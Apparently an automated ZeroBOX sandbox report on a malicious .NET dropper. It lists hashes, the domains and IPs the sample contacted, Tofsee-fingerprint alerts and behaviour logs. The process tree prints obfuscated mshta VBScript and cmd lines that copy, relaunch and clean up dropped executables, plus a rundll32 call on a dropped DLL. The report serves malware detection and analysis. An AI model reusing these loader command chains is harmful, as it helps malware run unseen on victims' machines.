Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 12, 2021, 2:45 p.m.	Sept. 12, 2021, 3:12 p.m.

Size	129.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`350591b477d7865635d863aec5da6379`
SHA256	`dd13e9eb4cb986d77106eda00bce3767ce2fda93e3cf425f144ec07a9863ae9e`
CRC32	`F133D235`
ssdeep	`1536:x6UupH1fE1eRC5LQ6Y1RTKkeGvYKpntPUPoibKZX:0UHzoBs7bm`
Yara	PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware Is_DotNET_EXE - (no description) IsPE32 - (no description)

PublicDwlBrowser144.exe "C:\Users\test22\AppData\Local\Temp\PublicDwlBrowser144.exe"
2264
- 853147.exe "C:\ProgramData\853147.exe"
  2492
- 1174114.exe "C:\ProgramData\1174114.exe"
  2884
  - WinHoster.exe "C:\Users\test22\AppData\Roaming\WinHost\WinHoster.exe"
    2144
- 4446173.exe "C:\ProgramData\4446173.exe"
  1116
  - mshta.exe "C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\4446173.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If """"== """" for %l In ( ""C:\ProgramData\4446173.exe"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))
    1304
    - cmd.exe "C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\4446173.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""=="" for %l In ( "C:\ProgramData\4446173.exe") do taskkill -Im "%~nxl" /F
      260
      - C3KHKEn~m73GVLA.exE C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9
        844
        
        mshta.exe "C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))
        2656
        
        cmd.exe "C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "=="" for %l In ( "C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F
        1420
        
        rundll32.exe "C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY
        2664
      - taskkill.exe taskkill -Im "4446173.exe" /F
        1040
- 2185135.exe "C:\ProgramData\2185135.exe"
  2092

Name	Response	Post-Analysis Lookup
wheelllc.bar	A 104.21.64.202 A 172.67.136.53	104.21.64.202
startupmart.bar	A 172.67.211.161 A 104.21.37.182	104.21.37.182
phonefix.bar	A 172.67.131.66 A 104.21.10.67	172.67.131.66
iplogger.org	A 88.99.66.31	88.99.66.31

IP Address	Status	Action
172.217.161.164	Active	Moloch
104.21.10.67	Active	Moloch
104.21.37.182	Active	Moloch
104.21.64.202	Active	Moloch
164.124.101.2	Active	Moloch
88.99.66.31	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49201 -> 104.21.37.182:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49210 -> 88.99.66.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49217 -> 104.21.64.202:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49213 -> 104.21.10.67:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49218 -> 88.99.66.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49201 104.21.37.182:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	d0:78:9b:08:f2:b6:0e:da:b4:de:37:46:98:ea:98:33:ac:62:58:1d
TLSv1 192.168.56.101:49210 88.99.66.31:443	C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA	CN=*.iplogger.org	55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb
TLSv1 192.168.56.101:49217 104.21.64.202:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	5e:f4:67:42:28:72:f0:d2:95:d8:9e:7d:2d:b6:fd:51:07:32:6d:ce
TLSv1 192.168.56.101:49213 104.21.10.67:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c8:84:e2:8e:b6:c5:30:52:c2:d2:ae:3f:0d:1d:9d:1f:b1:0e:0b:b3
TLSv1 192.168.56.101:49218 88.99.66.31:443	None	None	None

Queries for the computername (9 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 12, 2021, 3:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 12, 2021, 3:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 12, 2021, 3:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 12, 2021, 3:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 12, 2021, 3:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 12, 2021, 3:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 12, 2021, 3:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 12, 2021, 3:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 12, 2021, 3:11 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (13 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 12, 2021, 2:45 p.m.			0	0
IsDebuggerPresent Sept. 12, 2021, 2:45 p.m.			0	0
IsDebuggerPresent Sept. 12, 2021, 3:03 p.m.			0	0
IsDebuggerPresent Sept. 12, 2021, 3:03 p.m.			0	0
IsDebuggerPresent Sept. 12, 2021, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 12, 2021, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 12, 2021, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 12, 2021, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 12, 2021, 3:11 p.m.			0	0
IsDebuggerPresent Sept. 12, 2021, 3:11 p.m.			0	0
IsDebuggerPresent Sept. 12, 2021, 3:11 p.m.			0	0
IsDebuggerPresent Sept. 12, 2021, 3:11 p.m.			0	0
IsDebuggerPresent Sept. 12, 2021, 3:11 p.m.			0	0

Command line console output was observed (4 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 12, 2021, 3:11 p.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 12, 2021, 3:11 p.m.	buffer: The file cannot be copied onto itself. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 12, 2021, 3:11 p.m.	buffer: 0 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 12, 2021, 3:11 p.m.	buffer: SUCCESS: The process "4446173.exe" with PID 1116 has been terminated. console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (6 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 12, 2021, 3:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001accd470 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 12, 2021, 3:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001accd470 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 12, 2021, 3:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001accd400 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 12, 2021, 3:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x085dddf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 12, 2021, 3:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x085dddf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 12, 2021, 3:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00474f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 12, 2021, 2:45 p.m.		1	1	0

One or more processes crashed (37 events)

Time & API	Arguments	Status
__exception__ Sept. 12, 2021, 3:04 p.m.	stacktrace: 0x7fe91cae155 0x7fe91cadd34 0x7fe91cadbd5 0x7fe91cad3fc 0x7fe91cacef4 0x7fe91ca3c7e 0x7fe91ca3a69 0x7fe91ca3a1b CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef136f713 CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef136f242 StrongNameTokenFromPublicKey+0x50f2 SetRuntimeInfo-0x3684e clr+0x9b042 @ 0x7fef13bb042 StrongNameTokenFromPublicKey+0x4e33 SetRuntimeInfo-0x36b0d clr+0x9ad83 @ 0x7fef13bad83 mscorlib+0x563bfc @ 0x7fef0303bfc mscorlib+0x486001 @ 0x7fef0226001 0x7fe91ca0e3d CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef136f713 CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef136f242 CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef136f30b NGenCreateNGenWorker+0x63e7 _AxlPublicKeyBlobToPublicKeyToken-0x40e25 clr+0x215e4b @ 0x7fef1535e4b _CorExeMain+0x3ab6 ClrCreateManagedInstance-0x1538a clr+0x1e7976 @ 0x7fef1507976 _CorExeMain+0x39b0 ClrCreateManagedInstance-0x15490 clr+0x1e7870 @ 0x7fef1507870 _CorExeMain+0x3526 ClrCreateManagedInstance-0x1591a clr+0x1e73e6 @ 0x7fef15073e6 _CorExeMain+0x347e ClrCreateManagedInstance-0x159c2 clr+0x1e733e @ 0x7fef150733e _CorExeMain+0x14 ClrCreateManagedInstance-0x18e2c clr+0x1e3ed4 @ 0x7fef1503ed4 _CorExeMain+0x5d CLRCreateInstance-0x2bd3 mscoreei+0x74e5 @ 0x7fef30074e5 _CorExeMain+0x69 ND_RU1-0x1707 mscoree+0x5b21 @ 0x7fef3805b21 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76e5652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x771ec521 exception.instruction_r: 48 8b 40 08 48 8b 40 08 48 89 45 60 0f b6 45 58 exception.instruction: mov rax, qword ptr [rax + 8] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fe91cae155 registers.r14: 0 registers.r15: 0 registers.rcx: 0 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 2095200 registers.r11: 0 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0xaf60a5 0xaf2ac6 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b f8 8b 15 58 22 58 03 8b exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafa631 registers.esp: 3993264 registers.edi: 3993300 registers.eax: 0 registers.ebp: 3993316 registers.edx: 4531928 registers.ebx: 45101704 registers.esi: 45101692 registers.ecx: 0	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0xaf60a5 0xaf2ac6 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b f8 8b 15 58 22 58 03 8b exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafa631 registers.esp: 3993264 registers.edi: 3993300 registers.eax: 0 registers.ebp: 3993316 registers.edx: 4531928 registers.ebx: 45101704 registers.esi: 45101692 registers.ecx: 0	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0xaf60a5 0xaf2ac6 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b f8 8b 15 58 22 58 03 8b exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafa631 registers.esp: 3993264 registers.edi: 3993300 registers.eax: 0 registers.ebp: 3993316 registers.edx: 4531928 registers.ebx: 45101704 registers.esi: 45101692 registers.ecx: 0	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0xaf60a5 0xaf2ac6 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d8 8b cf e8 16 48 49 6e exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafa64a registers.esp: 3993264 registers.edi: 45220472 registers.eax: 0 registers.ebp: 3993316 registers.edx: 4531928 registers.ebx: 45101704 registers.esi: 45101692 registers.ecx: 0	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0xaf60a5 0xaf2ac6 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b f8 8b 15 58 22 58 03 8b exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafa631 registers.esp: 3993264 registers.edi: 45221056 registers.eax: 0 registers.ebp: 3993316 registers.edx: 4531928 registers.ebx: 45221180 registers.esi: 45221224 registers.ecx: 0	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0xaf60a5 0xaf2ac6 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b f8 8b 15 58 22 58 03 8b exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafa631 registers.esp: 3993264 registers.edi: 45222780 registers.eax: 0 registers.ebp: 3993316 registers.edx: 4531928 registers.ebx: 45222844 registers.esi: 45222976 registers.ecx: 0	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0xaf60a5 0xaf2ac6 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 